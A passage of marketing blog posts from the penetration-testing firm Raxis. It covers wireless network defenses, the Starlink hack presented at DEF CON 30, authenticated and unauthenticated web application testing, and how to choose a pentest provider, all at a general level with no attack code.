If a network isn’t properly secured, however, we might be able to find a way in that doesn’t require a password. Many people who use wireless mice and keyboards, for example, don’t realize that we can sometimes intercept those signals as well. For non-Bluetooth devices, we can use our aircrack-ng tools to execute commands from a user’s (already logged-in) device.
As a proof of concept, we sometimes change screensavers or backgrounds so that network admins can see which devices are vulnerable. However, we can also press the attack and see if we’re able to pivot and gain additional access.
The good news for business owners is that there are simple methods to protect against all these attacks:
Never create an open network. The convenience does not justify the security risk.
If you have a guest network, make sure that it is not connected to the corporate network and that users are unable to access data from any others who may also be using it.
Use the latest wireless security protocol (WPA3) if possible.
If you’re using WPA2 Enterprise, make sure the network is requiring TLS and certificates.
If you’re using WPA3 Personal, make sure your password is at least 30 characters long. (That’s not a typo – 30 characters is still out of reach for most hash-cracking software.)
Here’s the most important piece of advice: Test your network regularly. New exploits are found every day, and hackers’ tools get better, faster, and cheaper every day. The only way to stay ahead of them is with professionals like us who live in their world every day.
And, trust me, you’d much rather have Raxis find your vulnerabilities than the bad guys.
“As a professional, ethical hacker, I’ve gotten questions from family, friends, and neighbors about what this means – from its impact on the cost of the service to the future of humanity, depending on the paranoia level of the person asking.”
Scottie Cole, Lead Penetration Tester
The big news from this year’s Blackhat and DEF CON 30 hacker conventions came from a presentation by an engineer from Belgium, Lennert Wouters, detailing how he successfully hacked the entire Starlink ground network using one of the company’s own Dishy McFlatface® receivers. The way oversimplified summary is that he built a circuit board that allowed him to introduce a fault into Starlink’s security, which he then exploited to run custom code on the device.
After seeing some of the headlines, I now understand why some people are a little freaked out. So, as a public service, what follows is my opinion of what the non-hacker public should (and should not) take away from this news.
Yes, it’s a big deal (but maybe not for the reason you think). Let me be clear from the start, Lennert Wouters is a genius who deserves great respect for both the creative thinking and tenacity it took to accomplish this feat. This was a very complex hack that required a lot of hardware and software expertise, as well as a great deal of time to complete. That’s why . . .
The media’s “$25 in off-the-shelf components” is highly misleading. Scalpels are cheap, but you still don’t see a lot of DIY brain surgery. Expense usually isn’t a barrier to hackers, but expertise, time, and motivation frequently are. Wouters conceived of and executed the brilliant hack, but he was working on it because . . .
It was part of Starlink’s bug bounty program, designed to engage and reward super smart white hat hackers for finding problems first. In that sense, Wouters didn’t defeat Starlink’s cybersecurity but rather was an integral part of it. Other bounty hunters are still busy working on other exploits that could prove more significant – as are the bad guys. In fact . . .
The Russians (and likely others) have been trying to take down Starlink because the Ukrainian government now relies on the satellite network so heavily. State-sponsored hackers reportedly took down the Ukrainian government’s internet service early in the war. According to Starlink founder Elon Musk, however, the Russians have not been able to disrupt Ukraine’s access to the service or breach its network. Taken together, what all this means is that . . .
The Starlink hack, though impressive, likely does not represent a significant threat to the company or its users. On the one hand, I think this is a great story because I’m an electronics and “gadget” guy. As a penetration tester, however, I worry when business owners place a lot of focus on high-risk, low-probability hacks simply because they make the news. Over the course of thousands of penetration tests, the most common vulnerabilities Raxis finds are ones that are much simpler to exploit. Weak passwords, missing software patches, insufficient network segmentation, and a host of other, more pedestrian problems. The vulnerabilities might not make news, but the successful attack that follows – on a business, a hospital, or a school – many times does.
Wouters used a Starlink setup much like this one, plus “$25 in off-the-shelf materials” to carry out his hack. It’s a fascinating story, but there are much bigger threats facing businesses today.
The most important takeaways are that the biggest corporate networks on Earth (and beyond) can be hacked. The most secure networks are those that have an effective testing protocol that identifies vulnerabilities before they become breaches.
I’m Matt Dunn, a lead penetration tester at Raxis. This is the second of a two-part series, aimed at explaining the differences between authenticated and unauthenticated web application testing. I’ll also discuss the types of attacks we attempt in each scenario so you can see your app the way a hacker would.
Although some applications allow users to access some or all their functionality without providing credentials – think of simple mortgage or BMI calculators, among many others – most require some form of authentication to ensure you are authorized to use it. If there are multiple user roles, authentication will also determine what privileges you have and/or what features you can access. This is commonly referred to as role-based access control.
As I mentioned in the previous post, Raxis conducts web application testing from the perspectives of both authenticated and unauthenticated users. In authenticated user scenarios, we also test the security and business logic of the app for all user roles. Here’s what that looks like from a customer perspective.
Unauthenticated Testing
As the name suggests, testing as an unauthenticated user involves looking for vulnerabilities that are public-facing. The most obvious is access: Can we use our knowledge and tools to get past the authentication process? If so, that’s a serious problem, but it’s not the only thing we check.
In previous articles and videos, we’ve talked about account enumeration – finding valid usernames based on error messages, response lengths, or response times. We will see what information the app provides after unsuccessful login attempts. If we can get a valid username, then we can use other tools and tactics to determine the password. As an example, see the two different responses from a forgot password API for valid and invalid usernames below:
From an unauthenticated standpoint, we also will try injection attacks, such as SQL Injection, to attempt to break past login mechanisms. We’ll also look for protections using HTTP headers, such as Strict-Transport-Security and X-Frame-Options or Content-Security-Policy, to ensure users are as secure as they can be.
With some applications, we can use a web proxy tool to see which policies are enforced on the client-side interface and which are enforced on the server side. In a future post, we’ll go into more detail about web proxies. For now, it’s only important to know that proxies sometimes reveal vulnerabilities that allow us to bypass security used on the client and allow us to interact with the server directly.
As an example, fields that require specific values, such as an email field, may be verified to be in the proper format on the client-side (i.e. using JavaScript). Without proper safeguards in place, however, the server itself might accept any data, including malicious code, entered directly into that same field. In practice, this can be bypassed, leading to attacks such as Cross-Site Scripting, as shown in my CVE-2021-27956 that bypasses email verification.
Authenticated Testing
During an authenticated web application test, we use many of the same tactics, toward the same ends, as we do with unauthenticated tests. However, we have the added advantage of user access. This vantage point exposes the application to more vulnerabilities due to the expanded surface area of the application. This is why we recommend authenticated testing, to ensure even a malicious user cannot attack the application.
Once authenticated, we attempt is to see if the app restricts users to the level of access that matches its business logic. This might mean we log in with freemium-level credentials and see if we can get to paid-users-only functionality. Or, in the role of a basic user, we may try to gain administrator privileges.
As with an unauthenticated test, we also see how much filtering of data is done at the interface vs. the server. Some apps have very tight server-level controls for authentication but rely on less-restrictive policies once the user is validated.
Though it may seem simple from the outside, one of the hardest things for web app developers to secure is file uploads.
This is another topic we’ll explore further in a future post, however, one good example of the complexity involved is photo uploads. Many apps enable or require users to create profiles that include pictures or avatars. One way to restrict the file type is by accepting only .jpg or .png file extensions. Hackers can sometimes get past this restriction by appending an executable file with a double extension – malware.exe.jpg, for example.
Another problem is that malicious code could be inserted into otherwise legitimate file types such as word documents or spreadsheets. For many apps, however, it’s absolutely necessary to allow these file types. When we encounter such situations, we often work with the customers and recommend other security measures that allow the app to work as advertised but that also detect and block malware.
Conclusion
As a software engineer by training, one advantage I have in testing web applications is understanding the mindset of the developers working on them. People building apps start with the goal of creating something useful for customers. As time goes on, the team changes or users’ needs change, and sometimes vulnerabilities are left behind. This can happen in expected ways, such as outdated libraries, or unexpected ways, such as missing access control on a mostly unused account type.
At Raxis, we employ a group of experts with diverse experiences and skillsets who will intentionally try to break the app and use it improperly. Having testers who have also developed applications gives us empathy for app creators. Even as we attack their work, we know that we are helping them remediate vulnerabilities and making it possible for them to achieve their application’s purpose.
I’m Bonnie Smyre, Raxis’ Chief Operating Officer. Penetration testing is a niche in the cybersecurity field, but one that is critical to the integrity of your network and your data. This is the first of a two-part guide to help you select the right firm for your needs.
Step 1: Identify Your Why
There are lots of reasons why companies should routinely do penetration testing. The most important is to understand your vulnerabilities as they appear to hackers in the real world and work to harden your defenses. It may also be that your industry or profession requires testing to comply with certain laws or regulations. Or perhaps you’ve been warned about a specific, credible threat.
Whatever your reasons for seeking help, you’ll want to look for a firm that has relevant experience. For example, if you run a medical office, you’ll need a penetration testing company that knows the ins and outs of the Health Insurance Portability and Accountability Act (HIPAA). If you’re a manufacturer with industrial control systems, you’ll need a company that understands supervisory control and data acquisition (SCADA) testing. The point is to make sure you know your why before you look for a pentest firm.
See a term you don’t recognize? Look it up in our glossary.
Step 2: Understand What You Have at Risk
A closely related task is to be clear about what all you need to protect. Though it might seem obvious from the above examples, companies sometimes realize too late that they are custodians of data seemingly unrelated to their primary mission. A law firm, for instance, might receive and inadvertently store login credentials to access clients’ medical transcripts or bank accounts. Though its case files are stored on a secure server, a clever hacker could potentially steal personal identifiable information (PII) from the local hard drives.
Step 3: Determine What Type of Test You Need
General use of the term “pentesting” can cover a broad range of services, from almost-anything-goes red team engagements to vulnerability scans, though the latter is not a true penetration test. In last week’s post, lead penetration tester Matt Dunn discussed web application testing. There are also internal and external tests, as well as wireless, mobile, and API testing, to name a few. Raxis even offers continuous penetration testing for customers who need the ongoing assurance of security in any of these areas.
Raxis offers several types of penetration tests depending on your company’s needs:
Step 4: Consult Your Trusted Advisors
Most companies have IT experts onboard or on contract to manage and maintain their information systems. You may be inclined to start your search for a penetration testing service by asking for recommendations from them – and that’s a good idea. Most consultants, such as managed service providers (MSPs), value-added resellers (VARs), and independent software vendors (ISVs), recognize the value of high-quality, independent penetration testing.
In the case of MSPs, it might even be part of their service offerings. However, it might make sense to insist on an arm’s-length relationship between the company doing the testing and the people doing the remediation.
If your provider is resistant to pentesting, it might be because the company is concerned that the findings will reflect poorly on its work. You can work through those issues by making it clear that you share an interest in improving security and that’s the purpose for testing.
The downloadable PDF below includes this list of Raxis services with an explanation of what we test and and a brief explanation of how we go about it.
Another starting point – or at least a data point – is review and rating sites. This can be incredibly helpful since such sites usually include additional information about the services offered, types of customers, pricing, staffing, etc. That gives you a chance to compare the areas of expertise with the needs you identified in steps one and two. It can also introduce you to companies you might not have found otherwise.
Here are some resources you might find helpful as a start:
Once you have your short list of companies, it’s a good idea to talk to some of their customers, if possible, to find out what they liked or didn’t like about the service. Ask about communications. Were they kept in the loop about what was going on? Did the company explain both successful and unsuccessful breach attempts? Did they get a clear picture of the issues, presented as actionable storyboards?
In addition, it’s a good idea to ask about the people they worked with. Were they professional? Was it a full team or an individual? Do they bring a variety of skillsets to the table? Did they take time to understand your business model and test in a way that made sense? It’s important to remember here that many pentesting customers insist on privacy. The company may not be able to provide some references and others may not be willing to discuss the experience, However, some will, and that will add to your knowledgebase.
If you’ve completed steps 1 through 6, you should be armed with the information you need to begin interviewing potential penetration testing companies. You’ll be able to explain what you need and gauge whether they seem like a good match or not. And you’ll know how their customers feel about their service.
If you found this post helpful, make sure to follow our blog. In the weeks ahead, we’ll be discussing the questions you should ask potential pentesting companies – and the answers you should expect to hear.